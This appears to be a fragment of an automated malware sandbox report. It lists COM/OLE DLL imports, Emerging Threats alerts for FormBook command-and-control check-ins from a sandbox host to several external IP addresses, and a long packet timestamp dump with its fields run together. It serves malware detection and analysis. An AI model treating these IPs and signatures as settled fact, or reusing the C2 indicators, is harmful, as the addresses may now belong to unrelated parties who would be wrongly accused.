ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
OLEAUT32.dll | CreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture
Language of compilation system | Country where language is spoken | Map
English | Great Britain |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-09-05T14:24:29.528469+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 49711 | 199.59.243.226 | 80 | TCP
2024-09-05T14:24:29.528469+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 49711 | 199.59.243.226 | 80 | TCP
2024-09-05T14:24:45.410661+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 57192 | 72.52.178.23 | 80 | TCP
2024-09-05T14:24:47.999882+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 57193 | 72.52.178.23 | 80 | TCP
2024-09-05T14:24:50.562697+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 57194 | 72.52.178.23 | 80 | TCP
2024-09-05T14:24:53.108803+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 57195 | 72.52.178.23 | 80 | TCP
2024-09-05T14:24:53.108803+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 57195 | 72.52.178.23 | 80 | TCP
2024-09-05T14:25:06.999734+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 57196 | 15.197.240.20 | 80 | TCP
2024-09-05T14:25:09.543696+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 57197 | 15.197.240.20 | 80 | TCP
2024-09-05T14:25:12.097318+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 57198 | 15.197.240.20 | 80 | TCP
2024-09-05T14:25:12.097318+0200 | 2856318 | ETPRO MALWARE FormBook CnC Checkin (POST) M4 | 1 | 192.168.2.5 | 57198 | 15.197.240.20 | 80 | TCP
2024-09-05T14:25:14.634365+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 57199 | 15.197.240.20 | 80 | TCP
2024-09-05T14:25:14.634365+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 57199 | 15.197.240.20 | 80 | TCP
2024-09-05T14:25:28.483319+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 57200 | 199.59.243.226 | 80 | TCP
2024-09-05T14:25:31.040913+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 57201 | 199.59.243.226 | 80 | TCP
2024-09-05T14:25:33.548178+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 57202 | 199.59.243.226 | 80 | TCP
2024-09-05T14:25:36.174460+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 57203 | 199.59.243.226 | 80 | TCP
2024-09-05T14:25:36.174460+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 57203 | 199.59.243.226 | 80 | TCP
2024-09-05T14:25:50.658954+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 57204 | 162.0.213.94 | 80 | TCP
2024-09-05T14:25:53.204047+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 57205 | 162.0.213.94 | 80 | TCP
2024-09-05T14:25:55.738624+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 57206 | 162.0.213.94 | 80 | TCP
2024-09-05T14:25:58.268529+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 57207 | 162.0.213.94 | 80 | TCP
2024-09-05T14:25:58.268529+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 57207 | 162.0.213.94 | 80 | TCP
2024-09-05T14:26:04.426223+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 57208 | 13.248.151.237 | 80 | TCP
2024-09-05T14:26:06.979323+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 57209 | 13.248.151.237 | 80 | TCP
2024-09-05T14:26:09.504074+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 57210 | 13.248.151.237 | 80 | TCP
2024-09-05T14:26:12.167470+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 57211 | 13.248.151.237 | 80 | TCP
2024-09-05T14:26:12.167470+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 57211 | 13.248.151.237 | 80 | TCP
2024-09-05T14:26:17.952179+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 57212 | 34.149.87.45 | 80 | TCP
2024-09-05T14:26:20.494766+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 57213 | 34.149.87.45 | 80 | TCP
2024-09-05T14:26:23.015896+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 57214 | 34.149.87.45 | 80 | TCP
2024-09-05T14:26:25.546426+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 57215 | 34.149.87.45 | 80 | TCP
2024-09-05T14:26:25.546426+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 57215 | 34.149.87.45 | 80 | TCP
2024-09-05T14:26:31.226240+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 57216 | 91.203.110.247 | 80 | TCP
2024-09-05T14:26:33.887796+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 57217 | 91.203.110.247 | 80 | TCP
2024-09-05T14:26:36.447900+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 57218 | 91.203.110.247 | 80 | TCP
2024-09-05T14:26:38.962807+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 57219 | 91.203.110.247 | 80 | TCP
2024-09-05T14:26:38.962807+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 57219 | 91.203.110.247 | 80 | TCP
2024-09-05T14:26:44.499385+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 57220 | 34.149.87.45 | 80 | TCP
2024-09-05T14:26:47.030980+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 57221 | 34.149.87.45 | 80 | TCP
2024-09-05T14:26:49.688095+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 57222 | 34.149.87.45 | 80 | TCP
2024-09-05T14:26:52.280815+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 57223 | 34.149.87.45 | 80 | TCP
2024-09-05T14:26:52.280815+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 57223 | 34.149.87.45 | 80 | TCP
2024-09-05T14:26:57.961604+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 57224 | 72.52.178.23 | 80 | TCP
2024-09-05T14:27:00.476532+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 57225 | 72.52.178.23 | 80 | TCP
2024-09-05T14:27:03.017249+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 57226 | 72.52.178.23 | 80 | TCP
2024-09-05T14:27:05.588486+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 57227 | 72.52.178.23 | 80 | TCP
2024-09-05T14:27:05.588486+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 57227 | 72.52.178.23 | 80 | TCP
2024-09-05T14:27:11.584928+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 57228 | 199.59.243.226 | 80 | TCP
2024-09-05T14:27:14.189519+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 57229 | 199.59.243.226 | 80 | TCP
2024-09-05T14:27:17.145172+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 57230 | 199.59.243.226 | 80 | TCP
2024-09-05T14:27:19.681884+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 57231 | 199.59.243.226 | 80 | TCP
2024-09-05T14:27:19.681884+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 57231 | 199.59.243.226 | 80 | TCP
2024-09-05T14:27:33.552885+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 57232 | 199.59.243.226 | 80 | TCP
2024-09-05T14:27:36.110585+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 57233 | 199.59.243.226 | 80 | TCP
2024-09-05T14:27:38.652932+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 57234 | 199.59.243.226 | 80 | TCP
2024-09-05T14:27:41.175589+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 57235 | 199.59.243.226 | 80 | TCP
2024-09-05T14:27:41.175589+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 57235 | 199.59.243.226 | 80 | TCP
2024-09-05T14:27:49.709341+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 57236 | 199.59.243.226 | 80 | TCP
2024-09-05T14:27:49.709341+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 57236 | 199.59.243.226 | 80 | TCP
2024-09-05T14:27:55.252464+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 57237 | 72.52.178.23 | 80 | TCP
2024-09-05T14:27:57.753496+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 57238 | 72.52.178.23 | 80 | TCP
2024-09-05T14:28:00.299708+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 57239 | 72.52.178.23 | 80 | TCP
2024-09-05T14:28:02.888098+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 57240 | 72.52.178.23 | 80 | TCP
2024-09-05T14:28:02.888098+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 57240 | 72.52.178.23 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                    Sep 5, 2024 14:25:31.040862083 CEST8057201199.59.243.226192.168.2.5
                                                    Sep 5, 2024 14:25:31.040913105 CEST5720180192.168.2.5199.59.243.226
                                                    Sep 5, 2024 14:25:31.040998936 CEST8057201199.59.243.226192.168.2.5
                                                    Sep 5, 2024 14:25:31.041050911 CEST5720180192.168.2.5199.59.243.226
                                                    Sep 5, 2024 14:25:32.060965061 CEST5720180192.168.2.5199.59.243.226
                                                    Sep 5, 2024 14:25:33.080302000 CEST5720280192.168.2.5199.59.243.226
                                                    Sep 5, 2024 14:25:33.085149050 CEST8057202199.59.243.226192.168.2.5
                                                    Sep 5, 2024 14:25:33.085220098 CEST5720280192.168.2.5199.59.243.226
                                                    Sep 5, 2024 14:25:33.087347031 CEST5720280192.168.2.5199.59.243.226
                                                    Sep 5, 2024 14:25:33.094484091 CEST8057202199.59.243.226192.168.2.5
                                                    Sep 5, 2024 14:25:33.094616890 CEST8057202199.59.243.226192.168.2.5
                                                    Sep 5, 2024 14:25:33.547557116 CEST8057202199.59.243.226192.168.2.5
                                                    Sep 5, 2024 14:25:33.547616959 CEST8057202199.59.243.226192.168.2.5
                                                    Sep 5, 2024 14:25:33.548177958 CEST5720280192.168.2.5199.59.243.226
                                                    Sep 5, 2024 14:25:33.548604965 CEST8057202199.59.243.226192.168.2.5
                                                    Sep 5, 2024 14:25:33.552040100 CEST5720280192.168.2.5199.59.243.226
                                                    Sep 5, 2024 14:25:34.592761993 CEST5720280192.168.2.5199.59.243.226
                                                    Sep 5, 2024 14:25:35.610971928 CEST5720380192.168.2.5199.59.243.226
                                                    Sep 5, 2024 14:25:35.615870953 CEST8057203199.59.243.226192.168.2.5
                                                    Sep 5, 2024 14:25:35.620066881 CEST5720380192.168.2.5199.59.243.226
                                                    Sep 5, 2024 14:25:35.622976065 CEST5720380192.168.2.5199.59.243.226
                                                    Sep 5, 2024 14:25:35.627777100 CEST8057203199.59.243.226192.168.2.5
                                                    Sep 5, 2024 14:25:36.174249887 CEST8057203199.59.243.226192.168.2.5
                                                    Sep 5, 2024 14:25:36.174282074 CEST8057203199.59.243.226192.168.2.5
                                                    Sep 5, 2024 14:25:36.174294949 CEST8057203199.59.243.226192.168.2.5
                                                    Sep 5, 2024 14:25:36.174365997 CEST8057203199.59.243.226192.168.2.5
                                                    Sep 5, 2024 14:25:36.174459934 CEST5720380192.168.2.5199.59.243.226
                                                    Sep 5, 2024 14:25:36.174459934 CEST5720380192.168.2.5199.59.243.226
                                                    Sep 5, 2024 14:25:36.177076101 CEST5720380192.168.2.5199.59.243.226
                                                    Sep 5, 2024 14:25:36.181855917 CEST8057203199.59.243.226192.168.2.5
                                                    Sep 5, 2024 14:25:50.050396919 CEST5720480192.168.2.5162.0.213.94
                                                    Sep 5, 2024 14:25:50.055306911 CEST8057204162.0.213.94192.168.2.5
                                                    Sep 5, 2024 14:25:50.058168888 CEST5720480192.168.2.5162.0.213.94
                                                    Sep 5, 2024 14:25:50.058168888 CEST5720480192.168.2.5162.0.213.94
                                                    Sep 5, 2024 14:25:50.064186096 CEST8057204162.0.213.94192.168.2.5
                                                    Sep 5, 2024 14:25:50.658869028 CEST8057204162.0.213.94192.168.2.5
                                                    Sep 5, 2024 14:25:50.658911943 CEST8057204162.0.213.94192.168.2.5
                                                    Sep 5, 2024 14:25:50.658925056 CEST8057204162.0.213.94192.168.2.5
                                                    Sep 5, 2024 14:25:50.658937931 CEST8057204162.0.213.94192.168.2.5
                                                    Sep 5, 2024 14:25:50.658951044 CEST8057204162.0.213.94192.168.2.5
                                                    Sep 5, 2024 14:25:50.658953905 CEST5720480192.168.2.5162.0.213.94
                                                    Sep 5, 2024 14:25:50.658989906 CEST5720480192.168.2.5162.0.213.94
                                                    Sep 5, 2024 14:25:50.659126997 CEST8057204162.0.213.94192.168.2.5
                                                    Sep 5, 2024 14:25:50.659152985 CEST8057204162.0.213.94192.168.2.5
                                                    Sep 5, 2024 14:25:50.659162998 CEST5720480192.168.2.5162.0.213.94
                                                    Sep 5, 2024 14:25:50.659163952 CEST8057204162.0.213.94192.168.2.5
                                                    Sep 5, 2024 14:25:50.659193993 CEST5720480192.168.2.5162.0.213.94
                                                    Sep 5, 2024 14:25:50.659312963 CEST8057204162.0.213.94192.168.2.5
                                                    Sep 5, 2024 14:25:50.659326077 CEST8057204162.0.213.94192.168.2.5
                                                    Sep 5, 2024 14:25:50.659379005 CEST5720480192.168.2.5162.0.213.94
                                                    Sep 5, 2024 14:25:50.664133072 CEST8057204162.0.213.94192.168.2.5
                                                    Sep 5, 2024 14:25:50.664146900 CEST8057204162.0.213.94192.168.2.5
                                                    Sep 5, 2024 14:25:50.664159060 CEST8057204162.0.213.94192.168.2.5
                                                    Sep 5, 2024 14:25:50.664205074 CEST5720480192.168.2.5162.0.213.94
                                                    Sep 5, 2024 14:25:50.747368097 CEST8057204162.0.213.94192.168.2.5
                                                    Sep 5, 2024 14:25:50.747387886 CEST8057204162.0.213.94192.168.2.5
                                                    Sep 5, 2024 14:25:50.747410059 CEST8057204162.0.213.94192.168.2.5
                                                    Sep 5, 2024 14:25:50.747471094 CEST5720480192.168.2.5162.0.213.94
                                                    Sep 5, 2024 14:25:51.560691118 CEST5720480192.168.2.5162.0.213.94
                                                    Sep 5, 2024 14:25:52.593292952 CEST5720580192.168.2.5162.0.213.94
                                                    Sep 5, 2024 14:25:52.598450899 CEST8057205162.0.213.94192.168.2.5
                                                    Sep 5, 2024 14:25:52.598525047 CEST5720580192.168.2.5162.0.213.94
                                                    Sep 5, 2024 14:25:52.601150990 CEST5720580192.168.2.5162.0.213.94
                                                    Sep 5, 2024 14:25:52.606046915 CEST8057205162.0.213.94192.168.2.5
                                                    Sep 5, 2024 14:25:53.203957081 CEST8057205162.0.213.94192.168.2.5
                                                    Sep 5, 2024 14:25:53.203984976 CEST8057205162.0.213.94192.168.2.5
                                                    Sep 5, 2024 14:25:53.203996897 CEST8057205162.0.213.94192.168.2.5
                                                    Sep 5, 2024 14:25:53.204010010 CEST8057205162.0.213.94192.168.2.5
                                                    Sep 5, 2024 14:25:53.204046011 CEST8057205162.0.213.94192.168.2.5
                                                    Sep 5, 2024 14:25:53.204046965 CEST5720580192.168.2.5162.0.213.94
                                                    Sep 5, 2024 14:25:53.204056978 CEST8057205162.0.213.94192.168.2.5
                                                    Sep 5, 2024 14:25:53.204076052 CEST8057205162.0.213.94192.168.2.5
                                                    Sep 5, 2024 14:25:53.204078913 CEST5720580192.168.2.5162.0.213.94
                                                    Sep 5, 2024 14:25:53.204082966 CEST8057205162.0.213.94192.168.2.5
                                                    Sep 5, 2024 14:25:53.204088926 CEST8057205162.0.213.94192.168.2.5
                                                    Sep 5, 2024 14:25:53.204185963 CEST5720580192.168.2.5162.0.213.94
                                                    Sep 5, 2024 14:25:53.204904079 CEST8057205162.0.213.94192.168.2.5
                                                    Sep 5, 2024 14:25:53.204946041 CEST5720580192.168.2.5162.0.213.94
                                                    Sep 5, 2024 14:25:53.209186077 CEST8057205162.0.213.94192.168.2.5
                                                    Sep 5, 2024 14:25:53.209202051 CEST8057205162.0.213.94192.168.2.5
                                                    Sep 5, 2024 14:25:53.209214926 CEST8057205162.0.213.94192.168.2.5
                                                    Sep 5, 2024 14:25:53.209228992 CEST8057205162.0.213.94192.168.2.5
                                                    Sep 5, 2024 14:25:53.209274054 CEST5720580192.168.2.5162.0.213.94
                                                    Sep 5, 2024 14:25:53.209314108 CEST5720580192.168.2.5162.0.213.94
                                                    Sep 5, 2024 14:25:53.467974901 CEST8057205162.0.213.94192.168.2.5
                                                    Sep 5, 2024 14:25:53.467995882 CEST8057205162.0.213.94192.168.2.5
                                                    Sep 5, 2024 14:25:53.468010902 CEST8057205162.0.213.94192.168.2.5
                                                    Sep 5, 2024 14:25:53.468020916 CEST8057205162.0.213.94192.168.2.5
                                                    Sep 5, 2024 14:25:53.471733093 CEST5720580192.168.2.5162.0.213.94
                                                    Sep 5, 2024 14:25:54.107461929 CEST5720580192.168.2.5162.0.213.94
                                                    Sep 5, 2024 14:25:55.126266956 CEST5720680192.168.2.5162.0.213.94
                                                    Sep 5, 2024 14:25:55.131097078 CEST8057206162.0.213.94192.168.2.5
                                                    Sep 5, 2024 14:25:55.131201029 CEST5720680192.168.2.5162.0.213.94
                                                    Sep 5, 2024 14:25:55.133116007 CEST5720680192.168.2.5162.0.213.94
                                                    Sep 5, 2024 14:25:55.138137102 CEST8057206162.0.213.94192.168.2.5
                                                    Sep 5, 2024 14:25:55.138189077 CEST8057206162.0.213.94192.168.2.5
                                                    Sep 5, 2024 14:25:55.738493919 CEST8057206162.0.213.94192.168.2.5
                                                    Sep 5, 2024 14:25:55.738517046 CEST8057206162.0.213.94192.168.2.5
                                                    Sep 5, 2024 14:25:55.738528967 CEST8057206162.0.213.94192.168.2.5
                                                    Sep 5, 2024 14:25:55.738539934 CEST8057206162.0.213.94192.168.2.5
                                                    Sep 5, 2024 14:25:55.738567114 CEST8057206162.0.213.94192.168.2.5
                                                    Sep 5, 2024 14:25:55.738584042 CEST8057206162.0.213.94192.168.2.5
                                                    Sep 5, 2024 14:25:55.738595963 CEST8057206162.0.213.94192.168.2.5
                                                    Sep 5, 2024 14:25:55.738605022 CEST8057206162.0.213.94192.168.2.5
                                                    Sep 5, 2024 14:25:55.738615990 CEST8057206162.0.213.94192.168.2.5
                                                    Sep 5, 2024 14:25:55.738624096 CEST5720680192.168.2.5162.0.213.94
                                                    Sep 5, 2024 14:25:55.738629103 CEST8057206162.0.213.94192.168.2.5
                                                    Sep 5, 2024 14:25:55.738676071 CEST5720680192.168.2.5162.0.213.94
                                                    Sep 5, 2024 14:25:55.738676071 CEST5720680192.168.2.5162.0.213.94
                                                    Sep 5, 2024 14:25:55.738787889 CEST5720680192.168.2.5162.0.213.94
                                                    Sep 5, 2024 14:25:55.743557930 CEST8057206162.0.213.94192.168.2.5
                                                    Sep 5, 2024 14:25:55.743597984 CEST8057206162.0.213.94192.168.2.5
                                                    Sep 5, 2024 14:25:55.743609905 CEST8057206162.0.213.94192.168.2.5
                                                    Sep 5, 2024 14:25:55.743638992 CEST8057206162.0.213.94192.168.2.5
                                                    Sep 5, 2024 14:25:55.743649960 CEST8057206162.0.213.94192.168.2.5
                                                    Sep 5, 2024 14:25:55.743702888 CEST5720680192.168.2.5162.0.213.94
                                                    Sep 5, 2024 14:25:55.743774891 CEST5720680192.168.2.5162.0.213.94
                                                    Sep 5, 2024 14:25:55.825063944 CEST8057206162.0.213.94192.168.2.5
                                                    Sep 5, 2024 14:25:55.825078964 CEST8057206162.0.213.94192.168.2.5
                                                    Sep 5, 2024 14:25:55.825434923 CEST5720680192.168.2.5162.0.213.94
                                                    Sep 5, 2024 14:25:55.825510979 CEST8057206162.0.213.94192.168.2.5
                                                    Sep 5, 2024 14:25:55.825634956 CEST5720680192.168.2.5162.0.213.94
                                                    Sep 5, 2024 14:25:56.638796091 CEST5720680192.168.2.5162.0.213.94
                                                    Sep 5, 2024 14:25:57.657407045 CEST5720780192.168.2.5162.0.213.94
                                                    Sep 5, 2024 14:25:57.662604094 CEST8057207162.0.213.94192.168.2.5
                                                    Sep 5, 2024 14:25:57.665898085 CEST5720780192.168.2.5162.0.213.94
                                                    Sep 5, 2024 14:25:57.665898085 CEST5720780192.168.2.5162.0.213.94
                                                    Sep 5, 2024 14:25:57.670732021 CEST8057207162.0.213.94192.168.2.5
                                                    Sep 5, 2024 14:25:58.268325090 CEST8057207162.0.213.94192.168.2.5
                                                    Sep 5, 2024 14:25:58.268467903 CEST8057207162.0.213.94192.168.2.5
                                                    Sep 5, 2024 14:25:58.268486023 CEST8057207162.0.213.94192.168.2.5
                                                    Sep 5, 2024 14:25:58.268503904 CEST8057207162.0.213.94192.168.2.5
                                                    Sep 5, 2024 14:25:58.268517971 CEST8057207162.0.213.94192.168.2.5
                                                    Sep 5, 2024 14:25:58.268529892 CEST8057207162.0.213.94192.168.2.5
                                                    Sep 5, 2024 14:25:58.268528938 CEST5720780192.168.2.5162.0.213.94
                                                    Sep 5, 2024 14:25:58.268543005 CEST8057207162.0.213.94192.168.2.5
                                                    Sep 5, 2024 14:25:58.268553972 CEST8057207162.0.213.94192.168.2.5
                                                    Sep 5, 2024 14:25:58.268650055 CEST5720780192.168.2.5162.0.213.94
                                                    Sep 5, 2024 14:25:58.268733025 CEST5720780192.168.2.5162.0.213.94
                                                    Sep 5, 2024 14:25:58.270776987 CEST8057207162.0.213.94192.168.2.5
                                                    Sep 5, 2024 14:25:58.270786047 CEST8057207162.0.213.94192.168.2.5
                                                    Sep 5, 2024 14:25:58.270834923 CEST5720780192.168.2.5162.0.213.94
                                                    Sep 5, 2024 14:25:58.273403883 CEST8057207162.0.213.94192.168.2.5
                                                    Sep 5, 2024 14:25:58.273413897 CEST8057207162.0.213.94192.168.2.5
                                                    Sep 5, 2024 14:25:58.273423910 CEST8057207162.0.213.94192.168.2.5
                                                    Sep 5, 2024 14:25:58.273458004 CEST5720780192.168.2.5162.0.213.94
                                                    Sep 5, 2024 14:25:58.357995033 CEST8057207162.0.213.94192.168.2.5
                                                    Sep 5, 2024 14:25:58.358103991 CEST5720780192.168.2.5162.0.213.94
                                                    Sep 5, 2024 14:25:58.359051943 CEST8057207162.0.213.94192.168.2.5
                                                    Sep 5, 2024 14:25:58.517710924 CEST5720780192.168.2.5162.0.213.94
                                                    Sep 5, 2024 14:25:58.803172112 CEST8057207162.0.213.94192.168.2.5
                                                    Sep 5, 2024 14:25:58.803318024 CEST5720780192.168.2.5162.0.213.94
                                                    Sep 5, 2024 14:25:58.803708076 CEST8057207162.0.213.94192.168.2.5
                                                    Sep 5, 2024 14:25:58.803747892 CEST5720780192.168.2.5162.0.213.94
                                                    Sep 5, 2024 14:25:58.804272890 CEST5720780192.168.2.5162.0.213.94
                                                    Sep 5, 2024 14:25:58.804272890 CEST8057207162.0.213.94192.168.2.5
                                                    Sep 5, 2024 14:25:58.804316998 CEST5720780192.168.2.5162.0.213.94
                                                    Sep 5, 2024 14:25:58.810398102 CEST8057207162.0.213.94192.168.2.5
                                                    Sep 5, 2024 14:26:03.950030088 CEST5720880192.168.2.513.248.151.237
                                                    Sep 5, 2024 14:26:03.954916954 CEST805720813.248.151.237192.168.2.5
                                                    Sep 5, 2024 14:26:03.958194017 CEST5720880192.168.2.513.248.151.237
                                                    Sep 5, 2024 14:26:03.960134983 CEST5720880192.168.2.513.248.151.237
                                                    Sep 5, 2024 14:26:03.965259075 CEST805720813.248.151.237192.168.2.5
                                                    Sep 5, 2024 14:26:04.414572954 CEST805720813.248.151.237192.168.2.5
                                                    Sep 5, 2024 14:26:04.426175117 CEST805720813.248.151.237192.168.2.5
                                                    Sep 5, 2024 14:26:04.426223040 CEST5720880192.168.2.513.248.151.237
                                                    Sep 5, 2024 14:26:05.468013048 CEST5720880192.168.2.513.248.151.237
                                                    Sep 5, 2024 14:26:06.486428022 CEST5720980192.168.2.513.248.151.237
                                                    Sep 5, 2024 14:26:06.498245955 CEST805720913.248.151.237192.168.2.5
                                                    Sep 5, 2024 14:26:06.498320103 CEST5720980192.168.2.513.248.151.237
                                                    Sep 5, 2024 14:26:06.500579119 CEST5720980192.168.2.513.248.151.237
                                                    Sep 5, 2024 14:26:06.507147074 CEST805720913.248.151.237192.168.2.5
                                                    Sep 5, 2024 14:26:06.979032993 CEST805720913.248.151.237192.168.2.5
                                                    Sep 5, 2024 14:26:06.979273081 CEST805720913.248.151.237192.168.2.5
                                                    Sep 5, 2024 14:26:06.979322910 CEST5720980192.168.2.513.248.151.237
                                                    Sep 5, 2024 14:26:08.014909029 CEST5720980192.168.2.513.248.151.237
                                                    Sep 5, 2024 14:26:09.032109022 CEST5721080192.168.2.513.248.151.237
                                                    Sep 5, 2024 14:26:09.037066936 CEST805721013.248.151.237192.168.2.5
                                                    Sep 5, 2024 14:26:09.037204027 CEST5721080192.168.2.513.248.151.237
                                                    Sep 5, 2024 14:26:09.041007996 CEST5721080192.168.2.513.248.151.237
                                                    Sep 5, 2024 14:26:09.046139002 CEST805721013.248.151.237192.168.2.5
                                                    Sep 5, 2024 14:26:09.046149969 CEST805721013.248.151.237192.168.2.5
                                                    Sep 5, 2024 14:26:09.498462915 CEST805721013.248.151.237192.168.2.5
                                                    Sep 5, 2024 14:26:09.500220060 CEST805721013.248.151.237192.168.2.5
                                                    Sep 5, 2024 14:26:09.504074097 CEST5721080192.168.2.513.248.151.237
                                                    Sep 5, 2024 14:26:10.544985056 CEST5721080192.168.2.513.248.151.237
                                                    Sep 5, 2024 14:26:11.563625097 CEST5721180192.168.2.513.248.151.237
